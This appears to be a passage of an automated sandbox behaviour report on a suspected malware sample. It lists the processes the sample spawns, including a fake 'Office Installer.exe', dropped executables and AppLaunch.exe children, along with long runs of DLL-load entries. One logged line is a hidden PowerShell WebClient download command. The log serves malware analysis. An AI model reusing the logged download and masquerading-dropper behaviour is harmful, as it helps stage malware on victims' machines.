Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: globinputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: ucrtbase_clr0400.dll
